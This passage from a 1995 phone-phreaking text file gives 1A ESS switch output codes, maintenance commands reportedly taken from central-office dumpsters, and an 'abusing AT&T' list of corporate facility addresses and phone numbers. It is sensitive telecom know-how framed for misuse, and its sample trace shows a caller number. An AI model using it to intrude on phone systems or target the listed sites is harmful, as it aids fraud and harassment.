  2227. MA23  4 minute report, emergency action phase triggers are inhibited
  2228.  
  2229.       ** MEMORY **
  2230. MN02  List of circuits in trouble in memory
  2231.  
  2232.       ** NETWORK TROUBLE **
  2233. NT01  Network frame unable to switch off line after fault detection
  2234. NT02  Network path trouble Trunk to Line
  2235. NT03  Network path trouble Line to Line
  2236. NT04  Network path trouble Trunk to Trunk
  2237. NT06  Hourly report of network frames made busy
  2238. NT10  Network path failed to restore
  2239.  
  2240.       ** OPERATING SYSTEM STATUS **
  2241. OP:APS-0
  2242. OP:APSTATUS
  2243. OP:CHAN
  2244. OP:CISRC     Source of critical alarm, automatic every 15 minutes
  2245. OP:CSSTATUS  Call store status
  2246. OP:DUSTATUS  Data unit status
  2247. OP:ERAPDATA  Error analysis database output
  2248. OP:INHINT    Hourly report of inhibited devices
  2249. OP:LIBSTAT   List of active library programs
  2250. OP:OOSUNITS  Units out of service
  2251. OP:PSSTATUS  Program store status
  2252.  
  2253.       ** PLANT MEASUREMENTS **
  2254. PM01  Daily report
  2255. PM02  Monthly report
  2256. PM03  Response to a request for a specific section of report
  2257. PM04  Daily summary of IC/IEC irregularities
  2258.  
  2259.       ** REPORT **
  2260. REPT:ADS FUNCTION  Reports that a ADS function is about to occur
  2261. REPT:ADS FUNCTION DUPLEX FAILED No ADS assigned
  2262. REPT:ADS FUNCTION SIMPLEX Only one tape drive is assigned
  2263. REPT:ADS FUNCTION STATE CHANGE Change in state of ADS
  2264. REPT:ADS PROCEDURAL ERROR You fucked up
  2265. REPT:LINE TRBL Too many permanent off hooks, may indicate bad cable
  2266. REPT:PROG CONT OFF-NORMAL System programs that are off or on
  2267. REPT:RC CENSUS Hourly report on recent changes
  2268. REPT:RC SOURCE Recent change system status (RCS=1 means RC Channel inhibited)
  2269.  
  2270.       ** RECENT CHANGE **
  2271. RC18  RC message response
  2272.  
  2273.       ** REMOVE **
  2274. RMV   Removed from service
  2275.  
  2276.       ** RESTORE **
  2277. RST   Restored to service status
  2278.  
  2279.       ** RINGING AND TONE PLANT **
  2280. RT04  Status of monitors
  2281.  
  2282.       ** SOFTWARE AUDIT **
  2283. SA01  Call store memory audit results
  2284. SA03  Call store memory audit results
  2285.  
  2286.       ** SIGNAL IRREGULARITY **
  2287. SIG IRR  Blue box detection
  2288. SIG IRR INHIBITED  Detector off
  2289. SIG IRR TRAF  Half hour report of traffic data
  2290.  
  2291.       ** TRAFFIC CONDITION **
  2292. TC15  Reports overall traffic condition
  2293. TL02  Reason test position test was denied
  2294. TL03  Same as above
  2295.  
  2296.       ** TRUNK NETWORK **
  2297. TN01  Trunk diagnostic found trouble
  2298. TN02  Dial tone delay alarm failure
  2299. TN04  Trunk diag request from test panel
  2300. TN05  Trunk test procedural report or denials
  2301. TN06  Trunk state change
  2302. TN07  Response to a trunk type and status request
  2303. TN08  Failed incoming or outgoing call
  2304. TN09  Network relay failures
  2305. TN10  Response to TRK-LIST input, usually a request from test position
  2306. TN11  Hourly, status of trunk undergoing tests
  2307. TN16  Daily summary of precut trunk groups
  2308.  
  2309.       ** TRAFFIC OVERLOAD CONDITION **
  2310. TOC01 Serious traffic condition
  2311. TOC02 Reports status of less serious overload conditions
  2312.  
  2313.       ** TRANSLATION **  (shows class of service, calling features etc.)
  2314. TR01  Translation information, response to VFY-DN
  2315. TR03  Translation information, response to VFY-LEN
  2316. TR75  Translation information, response to VF:DNSVY
  2317.       **             **
  2318. TW02  Dump of octal contents of memory
  2319.  
  2320. Trace Output Appearance (COT - Customer Oriented Trace)
  2321. A 03 CT04 22 03 02  05 11 26  359  705 8500    <-- NUMBER CALLED
  2322.          CPN 212 382 8923                      <-- WHO CALLED
  2323.  
  2324.          01/14/95  22:03:02                    <-- TIME/DATE
  2325.          #236                                  <-- JOB NUMBER
  2326.  
  2327.  
  2328. Appendix 2 - Miscellaneous 1A Commands found on logs from CO dumpsters:
  2329. -=-=-=-=-=
  2330.  
  2331. RMV::NPC 69!
  2332. UTL::QRY.CMAP 136!
  2333. UTL::QRY.SCON to 135!        (as far out as   to 12003!)
  2334. UTL::QRY.SCON 13615/01!
  2335. UTL::QRY.ALMS!
  2336. UTL::QRY,WHO!
  2337. UTL::QRY,ALL!
  2338. UTL::QRY,FPKG!
  2339. UTL::QRY,UNIT1,FTMI1, EQL
  2340. GRTH::UNIT1!       (FT100) <-- comment written by command
  2341. GRTH::UNI1,FTMI1, EQL(L,R)     (2,2) <-- Example
  2342. UTL::QRY.!
  2343. RMV::LINK 3!
  2344. DGN::LINK 3!
  2345. RST::LINK 3!
  2346. UTL::QRY.TPS!
  2347.  
  2348. RST::TAPE!                     (This and the next two commands were
  2349. UTL::BMTR.FROM DISK.TO TAPE!    ALWAYS found together, and are pretty
  2350. RMV::TAPE!                      obvious)
  2351.  
  2352. SDIS::FROM 11204/03.TO 11204/04!
  2353. UTL::QRY.SCON.CH.TO 11204!
  2354. UTL::QRY.CMAP.TO 11204/03!
  2355. UTL::QRY,CMAP 01117!
  2356. SCON::RATE 96.FROM 11204/03.TO 11204/4!
  2357. LOGIN::USER DAX\
  2358. UTL::EQD,NPCS!
  2359. ADD::LINK 2,NPCAD E!
  2360.  
  2361. UTL::LOC,ETSI 101!
  2362.               |_|____________Bay        (These show physical locations
  2363.                 |____________Unit        of trunks)
  2364.  
  2365. UTL::LOC,NPC 01117!
  2366.  output -    1-01-38
  2367.              |__|__|_________Bay
  2368.                 |__|_________Unit
  2369.                    |_________38(1/8) inches
  2370.  
  2371.  
  2372. Appendix 3 - Suggested reading
  2373. -=-=-=-=-=
  2374.  
  2375. Acronyms 1988 (Phrack #20, file 11)
  2376. Central Office Operations by Agent Steal (LoDTJ #4, file 4)
  2377. ESS & 1A Switching Systems by Ninja Master
  2378. The Fine Art of Telephony by Crimson Flash (Phrack #38, file 7)
  2379. Guide to 5ESS by Firm G.R.A.S.P. (Phrack #43, file 16)
  2380. Lifting Ma Bell's Cloak of Secrecy by VaxCat (Phrack #24, file 9)
  2381. Operator Services Position System by Bandito (Phun #5, file 8)
  2382. Peering Into the soul of ESS by Jack the Ripper (Phun #5, file 2)
  2383.  
  2384. __________________________________________________________________________
  2385. (C)opywrong 1995, DeadKat Inc.
  2386. All wrongs denied.
  2387.  
  2388. <CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
  2389.  
  2390.  
  2391.  
  2392.                ▀▀▀▀▀▀▀▀▀
  2393.             ▀─────▀▀▀▀▀▀▀▀▀▀
  2394.           ▀▀────────▀▀▀▀▀▀▀▀▀▀      ┌────────────────────────────┐
  2395.          ▀▀──────────▀▀▀▀▀▀▀▀▀▀     │ Thank you for abusing AT&T │
  2396.         ▀▀───────────▀▀▀▀▀▀▀▀▀▀▀    └────────────────────────────┘
  2397.         ▀▀▀─────────▀▀▀▀▀▀▀▀▀▀▀▀               Part II
  2398.          ▀▀▀──────▀▀▀▀▀▀▀▀▀▀▀▀▀
  2399.           ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀           by Major & Dead Kat
  2400.             ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
  2401.                 ▀▀▀▀▀▀▀▀
  2402.  
  2403.  
  2404.  
  2405. Some of the "Frequently Visited AT&T Locations":
  2406.  
  2407. LOCATION                                    CITY       ST/ZIP    TELEPHONE
  2408. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  ~~~~~~~~~  ~~~~~~~~  ~~~~~~~~~~~
  2409.  
  2410. AT&T 1 PERIMETER PARK S.                    BIRMINGHAM AL 35243  205-969-4000
  2411. BIRMINGHAM AMO 300 CHASE PK.SO., RIVERCHASE BIRMINGHAM AL 35243  205-988-9300
  2412. MONTGOMERY MMC 2855 SELMA HIGHWAY           MONTGOMERY AL 36108  205-281-6200
  2413. AT&T 3280 DAUPHIN ST., BLDG B               MOBILE     AL 36606  205-470-1000
  2414. LITTLE ROCK WORKS 7600 INTERSTATE #30       LTTL ROCK  AR 72209  501-569-4411
  2415. AT&T 10825 #2 FINANCIAL CNTR. SUITE 300     LTTL ROCK  AR 72211  501-223-1000
  2416. PHOENIX WORKS 505 N.51ST AVE                PHOENIX    AZ 85002  602-233-5000
  2417. AT&T MICROELECT. SALES 432 N. 44TH ST.      PHOENIX    AZ 85008  602-204-1100
  2418. PHOENIX CAC 3750 W. INDIAN SCHOOL RD.       PHOENIX    AZ 85019  602-269-6666
  2419. AT&T 333 S. BEAUDRY AVE.                    L.A.       CA 90017  213-481-9100
  2420. AT&T 333 S. BEAUDRY AVE.                    L.A.       CA 90017  213-482-5799
  2421. LOS ANGELES CP (SVC) 2400 YATES AVE         L.A.       CA 90040  213-726-5000
  2422. CYPRESS INNST. 6300 GATEWAY DR.             CYPRESS    CA 90630  714-220-6200
  2423. AT&T MICROELEC. SLES 6300 GATEWAY DR.       CYPRESS    CA 90630  714-220-6223
  2424. AT&T 200 NO. WESTLAKE BLVD. SUITE 103       TH.OAKS    CA 91362  805-373-9390
  2425. VANDENBURG AFB FED. SYS                     LOMPOC     CA 93437  805-866-1611
  2426. AT&T FED SYS 3201 SKYWAY DR.                SAN MONICA CA 93455  805-349-8649
  2427. AT&T 1111 E. HERNDON AVE. SUITE 31          FRESNO     CA 93710  209-449-4200
  2428. AT&T SAND HILL RD SUITE 216                 MENLO PARK CA 94025  415-324-6000
  2429. AT&T 224 AIRPORT PKWY                       SAN JOSE   CA 94086  408-452-3200
  2430. SUNNYVALE REG. CTR. 1090 E. DUANE AVE.      SUNNYVALE  CA 94086  408-522-4000
  2431. HAYWARD SVC 1288 SAN LUIS OBISPO AVE.       HAYWARD    CA 94544  415-475-5000
  2432. AT&T 4430 ROSEWOOD DR.                      PLEASANTON CA 94566  415-224-1000
  2433. AT&T 1717 DOOLITTLE DR.                     SN LEANDRO CA 94577  415-678-1000
  2434. SAN RAMON AMO BLD 2440 CAMINO RAMON         SAN RAMON  CA 94583  415-830-4300
  2435. AT&T 2201 BROADWAY                          OAKLAND    CA 94612  415-273-2800
  2436. PACIFIC REGION MMC 3301 INDUSTRIAL AVE.     ROCKLIN    CA 95677  916-645-8911
  2437. AT&T 8950 CALIFORNIA CNTR. DR.              SACRAMENTO CA 95826  916-361-4600
  2438. DENVER SVC CNTR. 11900 E. CORNELL AVE.      AURORA     CO 80014  303-368-2000
  2439. AT&T 3190 S. VAUGHN WAY                     AURORA     CO 80014  303-695-5000
  2440. AT&T BMG 6200 S. SYRACUSE WAY               ENGLEWOOD  CO 80111  303-850-7000
  2441. AT&T-NS SALES 707 17TH ST.                  DENVER     CO 80202  303-291-4001
  2442. DENVER SVC 2551 E. 40TH AVE.                DENVER     CO 80205  303-291-4200
  2443. DENVER WORKS 1200 W. 120TH AVE              DENVER     CO 80234  303-538-1200
  2444. AT&T-BL DENVER NO. 12110 PECOS ST.          WESTMNSTR  CO 80234  303-538-1813
  2445. AT&T-BL 11900 N. PECOS ST.                  DENVER     CO 80234  303-538-4011
  2446. AT&T 7979 E. TUFTS AVE.                     DENVER     CO 80237  303-290-3100
  2447. AT&T 13952 DENVER WEST PKWY.                GOLDEN     CO 80401  303-273-2000
  2448. AT&T FED SYS 6200 S. SYRACUSE WAY           ENGLEWOOD  CO 80401  303-793-8800
  2449. AT&T-NS SALES 6300 GATEWAY DR.              CYPRESS    CO 90630  714-220-6200
  2450. AT&T 8 TWO MILE RD                          FARMINGTON CT 06032  203-678-3800
  2451. ORANGE CUST. REPAIR CTR. 50 BOSTON POST RD. ORANGE     CT 06477  203-795-4721
  2452. CONNECTICUT AMO 2750 DIXWELL AVE            HAMDEN     CT 06518  203-287-4070
  2453. AT&T 777 LONGRIDGE RD                       STAMFORD   CT 06851  203-845-5600
  2454. AT&T 1825 I ST. N.W. SUITE 800              WASHINGTON DC 20006  202-429-1300
  2455. WASH-DC 1120 20TH ST.,NW                    WASHINGTON DC 20006  202-457-2000
  2456. AT&T 222 DELAWARE AVE.                      WILMINGTON DE 19801  302-888-6000
  2457. AT&T 1401 E. BELMONT ST.                    PENSACOLA  FL 32501  904-432-7454
  2458. AT&T 151 S. WYMORE RD                       ALTA SPGS. FL 32714  407-869-2200
  2459. AT&T 2301 MAITLAND CTR. PKWY.               MAITLAND   FL 32751  407-660-3200
  2460. AT&T 2400 MAITLAND CTR. PKWY.               MAITLAND   FL 32751  407-660-3200
  2461. AT&T 850 TRAFALGAR COURT                    MAITLAND   FL 32751  407-660-3200
  2462. AT&T 901 LAKE DESTINY DR.                   ORLANDO    FL 32809  407-875-4400
  2463. AT&T 8221 EXCHANGE DRIVE                    ORLANDO    FL 32809  407-850-3000
  2464. AT&T 6039 S. RIO GRANDE AVE.                ORLANDO    FL 32809  407-850-8000
  2465. AT&T MICROELECT.9333 S. JOHN YOUNG PKWY     ORLANDO    FL 32819  407-345-6000
  2466. AT&T 9701 S. JOHN YOUNG PARKWAY             ORLANDO    FL 32819  407-351-7100
  2467. AT&T 100 WEST CYPRESS CREEK                 FT. LAUD.  FL 33309  305-493-6100
  2468. ATLANTA WKS 2000 NORTHEAST EXPRESSWAY       NORCROSS   GA 30071  404-447-2000
  2469. AT&T FED SYS. 1975 LAKESIDE PKWAY           TUCKER     GA 30085  404-496-8200
  2470. AT&T MICROELECT. SALES 3295 RIVER EXCH.DR   NORCROSS   GA 30092  404-390-5000
  2471. AT&T 1200 PEACHTREE ST. NE                  ATLANTA    GA 30309  404-390-5000
  2472. ATLANTA FOC 7840 ROSEWELL RD.               ATLANTA    GA 30328  404-390-5000
  2473. ATLANTA S. CTR. 6701 ROSEWELL RD. NE.       ATLANTA    GA 30328  404-573-4000
  2474. AT&T 2970 CLAIRMONT RD. 4TH FL              ATLANTA    GA 30329  404-248-2126
  2475. ATLANTA SVC 5885 FULTON IND'L BLVD. SW.     ATLANTA    GA 30336  404-346-4000
  2476. ATL-ACCTS PAY 365 NORTHRIDGE RD.            ATLANTA    GA 30338  404-392-8900
  2477. AT&T 2800 CENTURY CTR. PKWY                 ATLANTA    GA 30345  404-320-3800
  2478. ATLANTA DATA SYS 211 PERIMETER CTR. PKWY    ATLANTA    GA 30346  404-399-0100
  2479. ATLANTA FIN.OPS MORGAN FLS ROSEWELL RD.,NE. ATLANTA    GA 30350  404-390-5000
  2480. AT&T 2300 NORTHLAKE CTR.                    TUCKER     GA 30350  404-496-8200
  2481. AT&T MMC INTERSTATE 80 & HIGHWAY 630        UNDERWOOD  IA 51519  712-566-3300
  2482. ROLLING MEADOWS 3800 GOLD RD.               ROLNG MDWS IL 60008  708-290-2000
  2483. AT&T MICROELECT. SALES 500 PARK BLVD        ITASCA     IL 60143  312-855-6300
  2484. AT&T 150 MARTINDALE RD                      SHAUMBERG  IL 60173  708-605-5000
  2485. AT&T REPAIR & SRV. CTR. 1700 HAWTHORNE LN.  W CHICAGO  IL 60185  312-293-5100
  2486. AT&T DATA SVCS 180 HANSEN CT.               WOODDALE   IL 60191  708-860-8100
  2487. AT&T FED SYS 1411 OPUS PLACE                DOWNERS GR IL 60515  708-810-4000
  2488. AT&T 1111 W. 22ND ST.                       OAKBROOK   IL 60521  708-571-5320
  2489. UIS SHOWCASE 2600 WARRENVILLE RD.           LISLE      IL 60532  708-260-7900
  2490. NWSW CTR. 2600 WARRENVILLE RD.              LISLE      IL 60532  708-510-4000
  2491. NWSW CTR. CORPORATE LAKES 2500 CABOT DRIVE  LISLE      IL 60532  708-510-4000
  2492. LISLE PS 850 WARRENVILLE RD.                LISLE      IL 60532  708-719-1005
  2493. AT&T LISLE CTR 4513 WESTERN AVE.            LISLE      IL 60532  708-810-6000
  2494. CEO-WEST 1195 SUMMER HILL DRIVE             LISLE      IL 60532  708-971-5000
  2495. MONTGOMERY WORKS 800 S. RIVER ST.           MONTGOMERY IL 60538  708-859-4000
  2496. WARRENVILLE 28W. 615 FERRY RD.              WARRENVILE IL 60555  708-393-8000
  2497. INDIAN HILL COURT 1000 E. WARRENVILLE RD.   NAPERVILLE IL 60566  708-305-3000
  2498. IH PARK-BL 200 PARK PLAZA                   NAPERVILLE IL 60567  708-979-2000
  2499. AT&T ONE S. WACKER DRIVE                    CHICAGO    IL 60606  708-592-6558
  2500. AT&T 11595 N. MERIDIAN ST.                  CARMEL     IN 46032  317-844-6674
  2501. INDIANAPOLIS INST.8700ROBERTS DR SUITE 100  FISCHERS   IN 46038  317-578-0160
  2502. INDIANA AMO N. 151 N.DELAWARE ST. SUITE565  INDIANAPOL IN 46204  317-632-9161
  2503. INDIANAPOLIS SVC (CIC) 2855 N. FRANKLIN RD. INDIANAPOL IN 46219  317-352-0011
  2504. INDIANAPOLIS HERITAGE PK 6612 E. 75TH ST.   INDIANAPOL IN 46250  317-845-8980
  2505. AT&T 404 COLUMBIA PLACE-SUITE 210           SOUTH BEND IN 46601  219-232-2000
  2506. KANSAS CITY SVC CNTR. 9501 W. 67TH ST.      MERRIAM    KS 66203  913-677-6000
  2507. AT&T 5401 COLLEGE BLVD.                     LEAWOOD    KS 66211  913-491-9840
  2508. AT&T 200 NO. BROADWAY, SUITE 400            WICHITA    KS 67202  316-269-7500
  2509. AT&T 9300 SHELBYVILLE RD                    LOUISVILLE KY 40222  502-429-1000
  2510. AT&T 3500 N. CAUSEWAY BLVD. 10th FLOOR      METAIRIE   LA 70002  504-832-4300
  2511. AT&T 4354 S. SHERWOOD FOREST BLVD.          BATONROUGE LA 70816  504-922-6600
  2512. AT&T 3010 KNIGHT ST., SUITE 190             SHREVEPORT LA 71105  318-869-2041
  2513. SHREVEPORT WORKS 9595 MANSFIELD RD.         SHREVEPORT LA 71108  318-459-6000
  2514. AT&T 365 CADWELL DR. RM 168                 SPRINGFLD  MA 01104  413-785-4400
  2515. AT&T MICROELECT. 111 SPEEN ST.              FRAMINGHAM MA 01701  508-626-2161
  2516. ANDOVER 20 SHATTUCK RD.                     ANDOVER    MA 01810  508-691-3000
  2517. AT&T-WARD HILL 75 FOUNDATION AVE.           WARD HILL  MA 01835  508-374-5600
  2518. MERRIMACK VALLEY 1600 OSGOOD ST.            N.ANDOVER  MA 01845  508-960-2000
  2519. AT&T ACCT MGMT 800 BOYLESTON ST.            BOSTON     MA 02110  617-437-8800
  2520. AT&T-BL 800 BOYLESTON ST.                   BOSTON     MA 02110  617-437-8870
  2521. AT&T NAT'L ACCTS 100 SUMMER ST.             BOSTON     MA 02110  617-574-6000
  2522. NEW ENGLAND SVC 705 MT. AUBURN ST.          WATERTOWN  MA 02172  617-923-0765
  2523. AT&T 430 BEDFORD ST.                        LEXINGTON  MA 02173  617-863-9000
  2524. BETHESDA AMO 6410 ROCKLEDGE DR.             BETHESDA   MD 20817  301-493-2000
  2525. AT&T FED SYS 1100 WAYNE AVE                 SLVR SPGS  MD 20910  301-495-7400
  2526. COCKEYSVILLE N.S. SALES 225 SCHILLING CRCL. COCKEYVLLE MD 21030  301-584-1234
  2527. FEDERAL SYS. MD 9160 GUILFORD RD            COLUMBIA   MD 21045  301-369-7700
  2528. COULUMBIA MD 9305D GERWIG LN.               COLUMBIA   MD 21046  301-381-6150
  2529. AT&T 400 EAST PRATT ST.                     BALTIMORE  MD 21202  301-576-5700
  2530. TRANSPACIFIC COMM.,INC.1001 MCCOMAS ST.     BALTIMORE  MD 21230  301-385-0425
  2531. AT&T 136 COMMERCIAL ST., FLR 2              PORTLAND   ME 04101  207-761-1400
  2532. AT&T 26957 NORTHWESTERN HWY.                SOUTHFIELD MI 48034  313-353-6210
  2533. AT&T-NS 27777 FRANKLIN RD., SUITE 500       SOUTHFIELD MI 48034  313-355-7200
  2534. NILES MMC 2121 W. CHICAGO RD.               NILES      MI 49120  616-684-6400
  2535. AT&T 2861 CHARLEROIX, S.E.                  GRAND RPDS MI 49546  616-957-8200
  2536. AT&T 4480 W. ROUNDLAKE RD.                  ARDEN HLLS MN 55112  612-633-4803
  2537. MINNEAPOLIS SC 2230 COUNTY RD. H2           MOUNDSVIEW MN 55112  612-780-7750
  2538. AT&T 420 THIRD AVE. S., RM 670              MINEAPOLIS MN 55415  612-626-9300
  2539. AT&T MICROELECT. SALES W 82ND ST            BLOOMINGTN MN 55431  612-885-4600
  2540. BALLWIN 1111 WOODS MILL RD.                 BALLWIN    MO 63011  314-891-2000
  2541. ST.LOUIS-NS 701 MARKET ST. SUITE 900        ST. LOUIS  MO 63101  314-891-5000
  2542. AT&T 400 S. WOODS MILL RD.                  CHSTRFLD   MO 63107  314-275-1400
  2543. AT&T 424 S. WOODS MILL RD.                  CHSTRFLD   MO 63107  314-469-2500
  2544. KANSAS CITY WORKS 777 N. BLUE PKWY          LEESSUMMIT MO 64063  816-251-4000
  2545. KANSAS CITY AMO 1100 WALNUT ST.             KANSASCITY MO 64141  816-654-4000
  2546. NC WORKS 3300 LEXINGTON RD. S.E.            WIN-SALEM  NC 27102  919-784-1110
  2547. REYNOLDA RD. (DDO) 2400 REYNOLDA RD.        WIN-SALEM  NC 27106  919-727-3100
  2548. BURLINGOTN NC 204 GRAHAM-HOPEDALE RD.       BURLINGTON NC 27215  919-228-3000
  2549. GUILFORD CTR. I-85 MT HOPE CHURCH RD.       MCLEANSVLE NC 27301  919-279-7000
  2550. NS 1701 PINECROFT RD.                       GREENSBORO NC 27407  919-855-2775
  2551. AT&T 7031 ALBERT PICK RD., SUITE 300        GREENSBORO NC 27409  919-668-1800
  2552. AT&T ENGR. 3330 W. FRIENDLY AVE.            GREENSBORO NC 27410  919-379-5301
  2553. AT&T MICROELECT. SALES 5400 GLENWOOD RD.    RALEIGH    NC 27612  919-881-8023
  2554. AT&T 6701-A NORTHPARK BLVD.                 CHARLOTTE  NC 28216  704-597-3050
  2555. AT&T 2 CENTRAL PARK PLAZA                   OMAHA      NE 68102  402-595-5001
  2556. OMAHA AMO 222 S. 15th.ST, SUITE 200 S.      OMAHA      NE 68124  402-595-5001
  2557. OMAHA WORKS 120 & 1 ST                      OMAHA      NE 68137  402-691-3000
  2558. AT&T 10843 OLD MILL RD                      OMAHA      NE 68154  402-334-6000
  2559. AT&T 4 BEDFORD FARMS                        BEDFORD    NH 03102  603-623-6100
  2560. SIMPLEX WIRE (TYCO LABS) 2073 WOODBURY AVE. NEWINGTON  NH 03801  603-436-6100
  2561. PARSIPPANY 260 CHERRY HILL RD.              PARSIPPANY NJ 07054  201-299-3000
  2562. PARSIPPANY 4 WOOD HOLLOW RD.                PARSIPPANY NJ 07054  201-428-7700
  2563. PARSIPPANY CP 5 WOOD HOLLOW RD.             PARSIPPANY NJ 07054  201-581-3000
  2564. AT&T 99 JEFFERSON RD. WOODHOLLOW III        PARSIPPANY NJ 07054  201-581-5600
  2565. AT&T 4 CAMPUS DRIVE                         PARSIPPANY NJ 07054  201-829-1000
  2566. AT&T 700 LANIDEX PLAZA                      PARSIPPANY NJ 07054  201-884-7000
  2567. AT&T 1515 RTE 10                            PARSIPPANY NJ 07054  201-993-4200
  2568. LIBERTY CORNER 184 LIBERTY CORNER RD        WARREN     NJ 07060  201-580-4000
  2569. AT&T-BL WARREN SRVC. CTR. 5 REINMAN RD.     WARREN     NJ 07060  201-756-1527
  2570. CLARK SHOPS 100 TERMINAL AVE.               CLARK      NJ 07066  201-396-4000
  2571. SHORT HILLS BELL LABS 101 JFK PKWY          SHORTHILLS NJ 07078  201-564-2000
  2572. AT&T 5000 HADLEY RD                         SO.PLNFLD  NJ 07080  201-668-3200
  2573. QUALITY MGMT ENGIN. 650 LIBERTY AVE.        UNION      NJ 07083  201-851-3333
  2574. AT&T 1480 ROUTE 9 N.                        WOODBRIDGE NJ 07095  201-750-3100
  2575. TWO GATEWAY CTR.                            NEWARK     NJ 07102  201-468-6000
  2576. FREEHOLD AT&T JUNIPER PLAZA RT.9            FREEHOLD   NJ 07728  201-577-5000
  2577. AT&T-BL CRAWFORD HILL KEYPORT RD.           HOLMDEL    NJ 07733  201-888-7000
  2578. AT&T-BL CRAWFORDS CORNER RD                 HOLDMEL    NJ 07733  201-957-2000
  2579. AT&T 307 MIDDLETOWN-LINCROFT RD.            LINCROFT   NJ 07738  201-576-4000
  2580. RED HILL-BL 480 RED HILL RD                 MIDDLETOWN NJ 07748  201-949-3000
  2581. AT&T 200 LAUREL AVE                         MIDDLETOWN NJ 07748  201-957-2000
  2582. W. LONG BRANCH 185 MONMOUTH PKWY            W.LG.BRNCH NJ 07764  201-870-7000
  2583. SUMMIT 190 RIVER RD.                        SUMMIT     NJ 07901  201-522-6555
  2584. AT&T 233 MT. AIRY RD                        BSK RDGE   NJ 07920  201-204-4000
  2585. AT&T 188 MT. AIRY RD                        BSK RDGE   NJ 07920  201-221-2000
  2586. BASKING RIDGE 295 NO. MAPLE AVE.            BSK RDGE   NJ 07920  201-221-2000
  2587. AT&T 131 MORRISTOWN RD                      BSK RDGE   NJ 07920  201-953-3900
  2588. AT&T RMC 222 MT. AIRY RD                    BSK RDGE   NJ 07920  201-953-5300
  2589. AT&T INTNAT'L MT. KEMBLE AVE                BSK RDGE   NJ 07920  201-953-7000
  2590. AT&T-COMM. TR. 202-206N.                    BEDMINSTER NJ 07921  201-234-4000
  2591. BERKELEY HEIGHTS 1 OAK WAY                  BRKLY HGTS NJ 07922  201-771-2000
  2592. BERKELEY HEIGHTS 2 OAK WAY                  BRKLY HGTS NJ 07922  201-771-2000
  2593. BERNARDSVILLE 4 ESSEX AVE                   BERNARDSVL NJ 07924  201-204-2701
  2594. AT&T-BL NORTH RD                            CHESTER    NJ 07930  201-879-3400
  2595. MT. KEMBLE PLAZA 340 RTE. 202 S.            MORRISTOWN NJ 07960  201-326-2000
  2596. AT&T CAPITAL CORP. 44 WHIPPANY RD.          MORRISTOWN NJ 07960  201-397-3000
  2597. MORRISTOWN AMO 111 MADISON AVE.             MORRISTOWN NJ 07960  201-631-3700
  2598. AT&T 412 MOUNT KEMBLE AVE.                  MORRISTOWN NJ 07960  201-644-6000
  2599. AT&T 60 COLUMBIA TRNPK                      MORRISTOWN NJ 07960  201-829-7200
  2600. MORRIS BELL LABS 25 LINDSLEY DR.            MORRISTOWN NJ 07960  201-898-1000
  2601. AT&T 1 SPEEDWELL AVE.                       MORRISTOWN NJ 07960  201-898-2000
  2602. AT&T 1776 ON THE GREEN                      MORRISTOWN NJ 07960  201-898-6000
  2603. AT&T 100 SOUTHGATE PARKWAY                  MORRISTOWN NJ 07960  201-898-8000
  2604. SOUTH GATE 475 SOUTH ST.                    MORRISTOWN NJ 07962  201-606-2000
  2605. MURRAY HILL 600 MOUNTAIN AVE.               MURRAYHILL NJ 07974  201-582-3000
  2606. AT&T-T 40 MOUNTAIN AVE.                     MURRAYHILL NJ 07974  201-665-7000
  2607. WHIPPANY BELL LABS WHIPPANY RD              WHIPPANY   NJ 07981  201-386-3000
  2608. PENNSAUKEN SUP. 1077 THOM. BUSH MEM. HWY    PENNSAUKEN NJ 08110  609-488-9020
  2609. HOPEWELL-ERC CARTER RD.                     HPWL TNSHP NJ 08525  609-639-1234
  2610. HOPEWELL-CEC CARTER RD.                     HPWL TNSHP NJ 08525  609-639-4500
  2611. AT&T 29-C EMMONS DRIVE                      PRINCETON  NJ 08540  609-987-3000
  2612. LAWRENCEVILLE-CEC 3131 PRINCETON OFC PK     LRNCVLLE   NJ 08648  609-896-4000
  2613. AT&T COMM (IMS) 1300 WHITE HOUSE            TRENTON    NJ 08690  609-581-1000
  2614. AT&T 745 RT 202/206N                        BRIDGEWATR NJ 08807  201-231-6000
  2615. AT&T 95 CORPORATE DR.                       BRIDGEWATR NJ 08807  201-658-5000
  2616. AT&T MARKTG CTR 55 CORPORATE DR.            BRIDGEWATR NJ 08807  201-658-6000
  2617. AT&T 485 U.S. ROUTE 1 S., PKWY TOWERS       ISELIN     NJ 08830  201-855-8000
  2618. AT&T 80 NORTHFIELD AVE.                     EDISON     NJ 08837  201-225-8700
  2619. AT&T 20 KNIGHTSBRIDGE RD                    PISCATAWAY NJ 08854  201-457-1028
  2620. AT&T 30 KNIGHTSBRIDGE RD                    PISCATAWAY NJ 08854  201-457-2000
  2621. AT&T 180 CENTENNIAL AVE.                    PISCATAWAY NJ 08854  201-457-6000
  2622. AT&T CORP ED. 140 CENTENNIAL AVE.           PISCATAWAY NJ 08854  201-457-7000
  2623. AT&T 371 HOES LN.                           PISCATAWAY NJ 08854  201-463-2200
  2624. AT&T 242 OLD NEW BRUNSWICK RD               PISCATAWAY NJ 08854  201-562-6900
  2625. AT&T 100 ATRIUM WAY                         SOMERSET   NJ 08873  201-560-1300
  2626. AT&T PIXEL MACHINES 1 EXEC.DR.              SOMERSET   NJ 08873  201-563-2200
  2627. HOLMDEL-BL CRAWFORDS CORNER RD              HOLMDEL    NJ 07733  201-949-3000
  2628. AT&T 1001 MENAUL BLVD. N.E. B345            ALBUQURQUE NM 87107  505-761-6300
  2629. SANDIA NAT'L LABS 1515 EUBANK BLVD. S.E.    ALBUQURQUE NM 87123  505-844-5678
  2630. AT&T 220 EDISON WAY                         RENO       NV 89502  702-239-7015
  2631. AT&T ENVIRON SAFETY 32 AVE. OF AMERICAS     NEW YORK   NY 10013  212-219-6396
  2632. AT&T-NYC 22 CORTLANDT ST.                   NEW YORK   NY 10017  212-393-9800
  2633. 550 MADISON AVE.                            NEW YORK   NY 10022  212-605-5500
  2634. NS ONE PENN PLAZA SUITE 5420                NEW YORK   NY 10119  212-714-5900
  2635. AT&T 2 MANHATTANVILLE RD.                   PURCHASE   NY 10577  914-251-0700
  2636. SUFFERN MMC 22 HEMION RD.                   SUFFERN    NY 10901  914-577-6600
  2637. AT&T 520 BROAD HOLLOW RD.                   MELVILLE   NY 11747  516-420-3000
  2638. ALBANY 11 26 AVIATION RD.                   ALBANY     NY 12205  518-489-4615
